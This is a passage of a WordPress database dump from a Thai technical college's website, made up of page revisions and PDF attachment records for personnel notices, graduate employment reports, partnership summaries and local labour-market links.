#ff0000;\">คลิกที่นี่</span></a></span></h3>\n<h3><span style=\"color: #339966;\">**คำสั่งวิทยาลัยเทคนิคระยอง ที่ ๒๔๖๘ / ๒๕๖๐ เรื่อง แต่งตั้งข้าราชการครู ลูกจ้างประจำ พนักงานราชการ </span><span style=\"color: #339966;\">และลูกจ้างชั่วคราว ให้ทำหน้าที่ และปฏิบัติหน้าที่รับผิดชอบ <a href=\"/คำสั่งแต่งตั้ง-2468-2560\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></a></span></h3>\n<h3><span style=\"color: #800080;\"><strong>**หลักเกณฑ์และวิธีปฏิบัติในการจัดข้าราชการเข้าพักอาศัยในที่พักของทางราชการ </strong></span><span style=\"color: #339966;\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></span></h3>\n<h3><a href=\"/wp-content/uploads/2018/05/แบบฟอร์ม-ขออนุญาตไปราชการวิทยาลัย.pdf\">**แบบฟอร์มขออนุญาตไปราชการวิทยาลัย</a></h3>\n<h3>**การประเมินตนเองและการจัดทำแผนพัฒนาตนเอง(ID PLAN) <a href=\"/%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B9%80%E0%B8%A1%E0%B8%B4%E0%B8%99%E0%B8%95%E0%B8%99%E0%B9%80%E0%B8%AD%E0%B8%87%E0%B9%81%E0%B8%A5%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88/?preview_id=3020&preview_nonce=9d43a6f5df&_thumbnail_id=-1&preview=true\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></a></h3>\n ', 'งานบุคลากร', '', 'inherit', 'closed', 'closed', '', '1516-autosave-v1', '', '', '2018-06-18 13:31:57', '2018-06-18 06:31:57', '', 1516, 'http://www.technicrayong.ac.th/1516-autosave-v1/', 0, 'revision', '', 0),
(3027, 4, '2018-06-18 13:31:49', '2018-06-18 06:31:49', '<img class=\"aligncenter size-full wp-image-1469\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-25-12.jpg\" alt=\"\" width=\"195\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1467 \" src=\"/wp-content/uploads/2018/03/5-3-2561-11-04-59.jpg\" alt=\"\" width=\"365\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1597 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-01-48.jpg\" alt=\"\" width=\"731\" height=\"315\" />\r\n<h3><span style=\"color: #0000ff;\">**</span><span style=\"color: #0000ff;\">ข้อมูลบุคลากร ปี 2560 <a href=\"/%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B8%9A%E0%B8%B8%E0%B8%84%E0%B8%A5%E0%B8%B2%E0%B8%81%E0%B8%A360/\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></a></span></h3>\r\n<h3><span style=\"color: #339966;\">**คำสั่งวิทยาลัยเทคนิคระยอง ที่ ๒๔๖๘ / ๒๕๖๐ เรื่อง แต่งตั้งข้าราชการครู ลูกจ้างประจำ พนักงานราชการ </span><span style=\"color: #339966;\">และลูกจ้างชั่วคราว ให้ทำหน้าที่ และปฏิบัติหน้าที่รับผิดชอบ <a href=\"/คำสั่งแต่งตั้ง-2468-2560\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></a></span></h3>\r\n<h3><span style=\"color: #800080;\"><strong>**หลักเกณฑ์และวิธีปฏิบัติในการจัดข้าราชการเข้าพักอาศัยในที่พักของทางราชการ </strong></span><span style=\"color: #339966;\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></span></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/แบบฟอร์ม-ขออนุญาตไปราชการวิทยาลัย.pdf\">**แบบฟอร์มขออนุญาตไปราชการวิทยาลัย</a></h3>\r\n<h3>**การประเมินตนเองและการจัดทำแผนพัฒนาตนเอง(ID PLAN) <a href=\"http://www.technicrayong.ac.th/%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B9%80%E0%B8%A1%E0%B8%B4%E0%B8%99%E0%B8%95%E0%B8%99%E0%B9%80%E0%B8%AD%E0%B8%87%E0%B9%81%E0%B8%A5%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88/?preview_id=3020&preview_nonce=9d43a6f5df&_thumbnail_id=-1&preview=true\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></a></h3>\r\n ', 'งานบุคลากร', '', 'inherit', 'closed', 'closed', '', '1516-revision-v1', '', '', '2018-06-18 13:31:49', '2018-06-18 06:31:49', '', 1516, 'http://www.technicrayong.ac.th/1516-revision-v1/', 0, 'revision', '', 0),
(3028, 3, '2018-06-18 14:43:45', '2018-06-18 07:43:45', '<h2><span style=\"color: #800080;\">>>จำนวนสถานประกอบการ จังหวัดระยอง</span></h2>\r\n<img class=\"size-full wp-image-3024 aligncenter\" src=\"/wp-content/uploads/2018/06/ProvinceRayong2-copy.png\" alt=\"\" width=\"657\" height=\"446\" />\r\n\r\n<img class=\"size-full wp-image-3005 aligncenter\" src=\"/wp-content/uploads/2018/06/1-2.jpg\" alt=\"\" width=\"837\" height=\"374\" />\r\n\r\n<img class=\"size-full wp-image-3006 aligncenter\" src=\"/wp-content/uploads/2018/06/14-6-2561-10-42-35.jpg\" alt=\"\" width=\"839\" height=\"301\" />\r\n<h3><span style=\"color: #0000ff;\">รายงานการติดตามผลผู้สาเร็จการศึกษา เข้าสู่ตลาดแรงงาน </span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong>สรุปโครงการความร่วมมือกับหน่วยงานภายนอก MOU</strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong>สรุปโครงการความร่วมมือกับต่างประเทศ</strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong>สรุปโครงการความร่วมมือการจัดการอาชีวศึกษาระบบทวิภาคี</strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\">ข้อมูลตลาดแรงงาน และสถานประกอบการจังหวัดระยอง เพิ่มเติม >>> ตามเวปไซต์ และ LINK ด้านล่าง</span></h3>\r\n<a href=\"https://www.doe.go.th/prd/\"><img class=\"alignnone wp-image-2995\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-38-18.jpg\" alt=\"\" width=\"972\" height=\"152\" /></a>\r\n\r\n<a href=\"http://rayong.mol.go.th/\"><img class=\"alignnone wp-image-2996 size-full\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-44-40.jpg\" alt=\"\" width=\"905\" height=\"152\" /></a>\r\n\r\n<a href=\"http://www.ftijob.com/\"><img class=\"alignnone size-full wp-image-2997\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-48-31.jpg\" alt=\"\" width=\"979\" height=\"366\" /></a>\r\n\r\n<a href=\"https://www.doe.go.th/lmi-east/\"><img class=\"alignnone wp-image-2998\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-50-31.jpg\" alt=\"\" width=\"1041\" height=\"152\" /></a>\r\n\r\n<a href=\"http://www.v-cop.go.th/v-cop/\"><img class=\"alignnone wp-image-3001 size-full\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-57-42.jpg\" alt=\"\" width=\"1212\" height=\"356\" /></a>', 'ข้อมูลสถานประกอบการ', '', 'inherit', 'closed', 'closed', '', '2994-revision-v1', '', '', '2018-06-18 14:43:45', '2018-06-18 07:43:45', '', 2994, 'http://www.technicrayong.ac.th/2994-revision-v1/', 0, 'revision', '', 0),
(3029, 3, '2018-06-18 14:45:49', '2018-06-18 07:45:49', '<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/รายงานการติดตามผลผู้สำเร็จการศึกษา-ปีการศึกษา-2559-เข้าสู่ตลาดแรงงาน-พ.ศ.-2560.pdf\">รายงานการติดตามผลผู้สำเร็จการศึกษา ปีการศึกษา 2559 เข้าสู่ตลาดแรงงาน พ.ศ. 2560</a></span></h3>', 'รายงานการติดตามผลผู้สำเร็จการศึกษา เข้าสู่ตลาดแรงงาน ', '', 'publish', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%95%e0%b8%b4%e0%b8%94%e0%b8%95%e0%b8%b2%e0%b8%a1%e0%b8%9c%e0%b8%a5%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%aa%e0%b8%b2', '', '', '2018-06-18 15:19:49', '2018-06-18 08:19:49', '', 0, 'http://www.technicrayong.ac.th/?page_id=3029', 0, 'page', '', 0),
(3030, 3, '2018-06-18 14:44:55', '2018-06-18 07:44:55', '', 'รายงานการติดตามผลผู้สำเร็จการศึกษา ปีการศึกษา 2559 เข้าสู่ตลาดแรงงาน พ.ศ. 2560', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%95%e0%b8%b4%e0%b8%94%e0%b8%95%e0%b8%b2%e0%b8%a1%e0%b8%9c%e0%b8%a5%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%aa%e0%b8%b3', '', '', '2018-06-18 14:44:55', '2018-06-18 07:44:55', '', 3029, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/รายงานการติดตามผลผู้สำเร็จการศึกษา-ปีการศึกษา-2559-เข้าสู่ตลาดแรงงาน-พ.ศ.-2560.pdf', 0, 'attachment', 'application/pdf', 0),
(3031, 3, '2018-06-18 14:45:49', '2018-06-18 07:45:49', '<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/รายงานการติดตามผลผู้สำเร็จการศึกษา-ปีการศึกษา-2559-เข้าสู่ตลาดแรงงาน-พ.ศ.-2560.pdf\">รายงานการติดตามผลผู้สำเร็จการศึกษา ปีการศึกษา 2559 เข้าสู่ตลาดแรงงาน พ.ศ. 2560</a></span></h3>', 'รายงานการติดตามผลผู้สาเร็จการศึกษา เข้าสู่ตลาดแรงงาน ', '', 'inherit', 'closed', 'closed', '', '3029-revision-v1', '', '', '2018-06-18 14:45:49', '2018-06-18 07:45:49', '', 3029, 'http://www.technicrayong.ac.th/3029-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(3033, 3, '2018-06-18 14:47:30', '2018-06-18 07:47:30', '<h2><span style=\"color: #800080;\">>>จำนวนสถานประกอบการ จังหวัดระยอง</span></h2>\r\n<img class=\"size-full wp-image-3024 aligncenter\" src=\"/wp-content/uploads/2018/06/ProvinceRayong2-copy.png\" alt=\"\" width=\"657\" height=\"446\" />\r\n\r\n<img class=\"size-full wp-image-3005 aligncenter\" src=\"/wp-content/uploads/2018/06/1-2.jpg\" alt=\"\" width=\"837\" height=\"374\" />\r\n\r\n<img class=\"size-full wp-image-3006 aligncenter\" src=\"/wp-content/uploads/2018/06/14-6-2561-10-42-35.jpg\" alt=\"\" width=\"839\" height=\"301\" />\r\n<h3><a href=\"http://www.technicrayong.ac.th/รายงานการติดตามผลผู้สา\"><span style=\"color: #0000ff;\">รายงานการติดตามผลผู้สาเร็จการศึกษา เข้าสู่ตลาดแรงงาน </span></a></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong>สรุปโครงการความร่วมมือกับหน่วยงานภายนอก MOU</strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong>สรุปโครงการความร่วมมือกับต่างประเทศ</strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong>สรุปโครงการความร่วมมือการจัดการอาชีวศึกษาระบบทวิภาคี</strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\">ข้อมูลตลาดแรงงาน และสถานประกอบการจังหวัดระยอง เพิ่มเติม >>> ตามเวปไซต์ และ LINK ด้านล่าง</span></h3>\r\n<a href=\"https://www.doe.go.th/prd/\"><img class=\"alignnone wp-image-2995\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-38-18.jpg\" alt=\"\" width=\"972\" height=\"152\" /></a>\r\n\r\n<a href=\"http://rayong.mol.go.th/\"><img class=\"alignnone wp-image-2996 size-full\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-44-40.jpg\" alt=\"\" width=\"905\" height=\"152\" /></a>\r\n\r\n<a href=\"http://www.ftijob.com/\"><img class=\"alignnone size-full wp-image-2997\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-48-31.jpg\" alt=\"\" width=\"979\" height=\"366\" /></a>\r\n\r\n<a href=\"https://www.doe.go.th/lmi-east/\"><img class=\"alignnone wp-image-2998\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-50-31.jpg\" alt=\"\" width=\"1041\" height=\"152\" /></a>\r\n\r\n<a href=\"http://www.v-cop.go.th/v-cop/\"><img class=\"alignnone wp-image-3001 size-full\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-57-42.jpg\" alt=\"\" width=\"1212\" height=\"356\" /></a>', 'ข้อมูลสถานประกอบการ', '', 'inherit', 'closed', 'closed', '', '2994-revision-v1', '', '', '2018-06-18 14:47:30', '2018-06-18 07:47:30', '', 2994, 'http://www.technicrayong.ac.th/2994-revision-v1/', 0, 'revision', '', 0),
(3034, 3, '2018-06-18 15:06:03', '2018-06-18 08:06:03', '<h3><a href=\"/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือกับหน่วยงานภายนอก-ปี-2560.pdf\">สรุปโครงการความร่วมมือกับหน่วยงานภายนอก ปี 2560</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือกับหน่วยงานภายนอก-ปี-2559.pdf\">สรุปโครงการความร่วมมือกับหน่วยงานภายนอก ปี 2559</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือกับหน่วยงานภายนอก-ปี-2558.pdf\">สรุปโครงการความร่วมมือกับหน่วยงานภายนอก ปี 2558</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือกับหน่วยงานภายนอก-ปี-2557.pdf\">สรุปโครงการความร่วมมือกับหน่วยงานภายนอก ปี 2557</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือกับหน่วยงานภายนอก-ปี-2556.pdf\">สรุปโครงการความร่วมมือกับหน่วยงานภายนอก ปี 2556</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือกับหน่วยงานภายนอก-ปี-2553.pdf\">สรุปโครงการความร่วมมือกับหน่วยงานภายนอก ปี 2553</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือกับหน่วยงานภายนอก-ปี-2552.pdf\">สรุปโครงการความร่วมมือกับหน่วยงานภายนอก ปี 2552</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือกับหน่วยงานภายนอก-ปี-2551.pdf\">สรุปโครงการความร่วมมือกับหน่วยงานภายนอก ปี 2551</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือกับหน่วยงานภายนอก-ปี-2549.pdf\">สรุปโครงการความร่วมมือกับหน่วยงานภายนอก ปี 2549</a></h3>\r\n ', 'สรุปโครงการความร่วมมือกับหน่วยงานภายนอก', '', 'publish', 'closed', 'closed', '', '%e0%b8%aa%e0%b8%a3%e0%b8%b8%e0%b8%9b%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%a3%e0%b9%88%e0%b8%a7%e0%b8%a1%e0%b8%a1%e0%b8%b7%e0%b8%ad', '', '', '2018-06-18 15:06:03', '2018-06-18 08:06:03', '', 0, 'http://www.technicrayong.ac.th/?page_id=3034', 0, 'page', '', 0),
(3035, 3, '2018-06-18 15:03:44', '2018-06-18 08:03:44', '', 'สรุปโครงการความร่วมมือกับหน่วยงานภายนอก ปี 2549', '', 'inherit', 'closed', 'closed', '', '%e0%b8%aa%e0%b8%a3%e0%b8%b8%e0%b8%9b%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%a3%e0%b9%88%e0%b8%a7%e0%b8%a1%e0%b8%a1%e0%b8%b7%e0%b8%ad', '', '', '2018-06-18 15:03:44', '2018-06-18 08:03:44', '', 3034, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือกับหน่วยงานภายนอก-ปี-2549.pdf', 0, 'attachment', 'application/pdf', 0),
(3036, 3, '2018-06-18 15:03:48', '2018-06-18 08:03:48', '', 'สรุปโครงการความร่วมมือกับหน่วยงานภายนอก ปี 2551', '', 'inherit', 'closed', 'closed', '', '%e0%b8%aa%e0%b8%a3%e0%b8%b8%e0%b8%9b%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%a3%e0%b9%88%e0%b8%a7%e0%b8%a1%e0%b8%a1%e0%b8%b7%e0%b8%ad-2', '', '', '2018-06-18 15:03:48', '2018-06-18 08:03:48', '', 3034, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือกับหน่วยงานภายนอก-ปี-2551.pdf', 0, 'attachment', 'application/pdf', 0),
(3037, 3, '2018-06-18 15:03:52', '2018-06-18 08:03:52', '', 'สรุปโครงการความร่วมมือกับหน่วยงานภายนอก ปี 2552', '', 'inherit', 'closed', 'closed', '', '%e0%b8%aa%e0%b8%a3%e0%b8%b8%e0%b8%9b%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%a3%e0%b9%88%e0%b8%a7%e0%b8%a1%e0%b8%a1%e0%b8%b7%e0%b8%ad-3', '', '', '2018-06-18 15:03:52', '2018-06-18 08:03:52', '', 3034, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือกับหน่วยงานภายนอก-ปี-2552.pdf', 0, 'attachment', 'application/pdf', 0),
(3038, 3, '2018-06-18 15:03:56', '2018-06-18 08:03:56', '', 'สรุปโครงการความร่วมมือกับหน่วยงานภายนอก ปี 2553', '', 'inherit', 'closed', 'closed', '', '%e0%b8%aa%e0%b8%a3%e0%b8%b8%e0%b8%9b%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%a3%e0%b9%88%e0%b8%a7%e0%b8%a1%e0%b8%a1%e0%b8%b7%e0%b8%ad-4', '', '', '2018-06-18 15:03:56', '2018-06-18 08:03:56', '', 3034, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือกับหน่วยงานภายนอก-ปี-2553.pdf', 0, 'attachment', 'application/pdf', 0),
(3039, 3, '2018-06-18 15:03:57', '2018-06-18 08:03:57', '', 'สรุปโครงการความร่วมมือกับหน่วยงานภายนอก ปี 2556', '', 'inherit', 'closed', 'closed', '', '%e0%b8%aa%e0%b8%a3%e0%b8%b8%e0%b8%9b%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%a3%e0%b9%88%e0%b8%a7%e0%b8%a1%e0%b8%a1%e0%b8%b7%e0%b8%ad-5', '', '', '2018-06-18 15:03:57', '2018-06-18 08:03:57', '', 3034, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือกับหน่วยงานภายนอก-ปี-2556.pdf', 0, 'attachment', 'application/pdf', 0),
(3040, 3, '2018-06-18 15:03:59', '2018-06-18 08:03:59', '', 'สรุปโครงการความร่วมมือกับหน่วยงานภายนอก ปี 2557', '', 'inherit', 'closed', 'closed', '', '%e0%b8%aa%e0%b8%a3%e0%b8%b8%e0%b8%9b%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%a3%e0%b9%88%e0%b8%a7%e0%b8%a1%e0%b8%a1%e0%b8%b7%e0%b8%ad-6', '', '', '2018-06-18 15:03:59', '2018-06-18 08:03:59', '', 3034, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือกับหน่วยงานภายนอก-ปี-2557.pdf', 0, 'attachment', 'application/pdf', 0),
(3041, 3, '2018-06-18 15:04:00', '2018-06-18 08:04:00', '', 'สรุปโครงการความร่วมมือกับหน่วยงานภายนอก ปี 2558', '', 'inherit', 'closed', 'closed', '', '%e0%b8%aa%e0%b8%a3%e0%b8%b8%e0%b8%9b%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%a3%e0%b9%88%e0%b8%a7%e0%b8%a1%e0%b8%a1%e0%b8%b7%e0%b8%ad-7', '', '', '2018-06-18 15:04:00', '2018-06-18 08:04:00', '', 3034, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือกับหน่วยงานภายนอก-ปี-2558.pdf', 0, 'attachment', 'application/pdf', 0),
(3042, 3, '2018-06-18 15:04:02', '2018-06-18 08:04:02', '', 'สรุปโครงการความร่วมมือกับหน่วยงานภายนอก ปี 2559', '', 'inherit', 'closed', 'closed', '', '%e0%b8%aa%e0%b8%a3%e0%b8%b8%e0%b8%9b%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%a3%e0%b9%88%e0%b8%a7%e0%b8%a1%e0%b8%a1%e0%b8%b7%e0%b8%ad-8', '', '', '2018-06-18 15:04:02', '2018-06-18 08:04:02', '', 3034, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือกับหน่วยงานภายนอก-ปี-2559.pdf', 0, 'attachment', 'application/pdf', 0),
(3043, 3, '2018-06-18 15:04:03', '2018-06-18 08:04:03', '', 'สรุปโครงการความร่วมมือกับหน่วยงานภายนอก ปี 2560', '', 'inherit', 'closed', 'closed', '', '%e0%b8%aa%e0%b8%a3%e0%b8%b8%e0%b8%9b%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%a3%e0%b9%88%e0%b8%a7%e0%b8%a1%e0%b8%a1%e0%b8%b7%e0%b8%ad-9', '', '', '2018-06-18 15:04:03', '2018-06-18 08:04:03', '', 3034, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือกับหน่วยงานภายนอก-ปี-2560.pdf', 0, 'attachment', 'application/pdf', 0),
(3044, 3, '2018-06-18 15:06:03', '2018-06-18 08:06:03', '<h3><a href=\"/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือกับหน่วยงานภายนอก-ปี-2560.pdf\">สรุปโครงการความร่วมมือกับหน่วยงานภายนอก ปี 2560</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือกับหน่วยงานภายนอก-ปี-2559.pdf\">สรุปโครงการความร่วมมือกับหน่วยงานภายนอก ปี 2559</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือกับหน่วยงานภายนอก-ปี-2558.pdf\">สรุปโครงการความร่วมมือกับหน่วยงานภายนอก ปี 2558</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือกับหน่วยงานภายนอก-ปี-2557.pdf\">สรุปโครงการความร่วมมือกับหน่วยงานภายนอก ปี 2557</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือกับหน่วยงานภายนอก-ปี-2556.pdf\">สรุปโครงการความร่วมมือกับหน่วยงานภายนอก ปี 2556</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือกับหน่วยงานภายนอก-ปี-2553.pdf\">สรุปโครงการความร่วมมือกับหน่วยงานภายนอก ปี 2553</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือกับหน่วยงานภายนอก-ปี-2552.pdf\">สรุปโครงการความร่วมมือกับหน่วยงานภายนอก ปี 2552</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือกับหน่วยงานภายนอก-ปี-2551.pdf\">สรุปโครงการความร่วมมือกับหน่วยงานภายนอก ปี 2551</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือกับหน่วยงานภายนอก-ปี-2549.pdf\">สรุปโครงการความร่วมมือกับหน่วยงานภายนอก ปี 2549</a></h3>\r\n ', 'สรุปโครงการความร่วมมือกับหน่วยงานภายนอก', '', 'inherit', 'closed', 'closed', '', '3034-revision-v1', '', '', '2018-06-18 15:06:03', '2018-06-18 08:06:03', '', 3034, 'http://www.technicrayong.ac.th/3034-revision-v1/', 0, 'revision', '', 0),
(3045, 3, '2018-06-18 15:06:15', '2018-06-18 08:06:15', '<h3><a href=\"/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือกับหน่วยงานภายนอก-ปี-2560.pdf\">สรุปโครงการความร่วมมือกับหน่วยงานภายนอก ปี 2560</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือกับหน่วยงานภายนอก-ปี-2559.pdf\">สรุปโครงการความร่วมมือกับหน่วยงานภายนอก ปี 2559</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือกับหน่วยงานภายนอก-ปี-2558.pdf\">สรุปโครงการความร่วมมือกับหน่วยงานภายนอก ปี 2558</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือกับหน่วยงานภายนอก-ปี-2557.pdf\">สรุปโครงการความร่วมมือกับหน่วยงานภายนอก ปี 2557</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือกับหน่วยงานภายนอก-ปี-2556.pdf\">สรุปโครงการความร่วมมือกับหน่วยงานภายนอก ปี 2556</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือกับหน่วยงานภายนอก-ปี-2553.pdf\">สรุปโครงการความร่วมมือกับหน่วยงานภายนอก ปี 2553</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือกับหน่วยงานภายนอก-ปี-2552.pdf\">สรุปโครงการความร่วมมือกับหน่วยงานภายนอก ปี 2552</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือกับหน่วยงานภายนอก-ปี-2551.pdf\">สรุปโครงการความร่วมมือกับหน่วยงานภายนอก ปี 2551</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือกับหน่วยงานภายนอก-ปี-2549.pdf\">สรุปโครงการความร่วมมือกับหน่วยงานภายนอก ปี 2549</a></h3>\r\n ', 'สรุปโครงการความร่วมมือกับหน่วยงานภายนอก', '', 'inherit', 'closed', 'closed', '', '3034-autosave-v1', '', '', '2018-06-18 15:06:15', '2018-06-18 08:06:15', '', 3034, 'http://www.technicrayong.ac.th/3034-autosave-v1/', 0, 'revision', '', 0),
(3046, 3, '2018-06-18 15:06:42', '2018-06-18 08:06:42', '<h2><span style=\"color: #800080;\">>>จำนวนสถานประกอบการ จังหวัดระยอง</span></h2>\r\n<img class=\"size-full wp-image-3024 aligncenter\" src=\"/wp-content/uploads/2018/06/ProvinceRayong2-copy.png\" alt=\"\" width=\"657\" height=\"446\" />\r\n\r\n<img class=\"size-full wp-image-3005 aligncenter\" src=\"/wp-content/uploads/2018/06/1-2.jpg\" alt=\"\" width=\"837\" height=\"374\" />\r\n\r\n<img class=\"size-full wp-image-3006 aligncenter\" src=\"/wp-content/uploads/2018/06/14-6-2561-10-42-35.jpg\" alt=\"\" width=\"839\" height=\"301\" />\r\n<h3><a href=\"/รายงานการติดตามผลผู้สา\"><span style=\"color: #0000ff;\">รายงานการติดตามผลผู้สาเร็จการศึกษา เข้าสู่ตลาดแรงงาน </span></a></h3>\r\n<h3><a href=\"http://www.technicrayong.ac.th/สรุปโครงการความร่วมมือ\"><span style=\"color: #0000ff;\"><strong>สรุปโครงการความร่วมมือกับหน่วยงานภายนอก</strong></span></a></h3>\r\n<h3><span style=\"color: 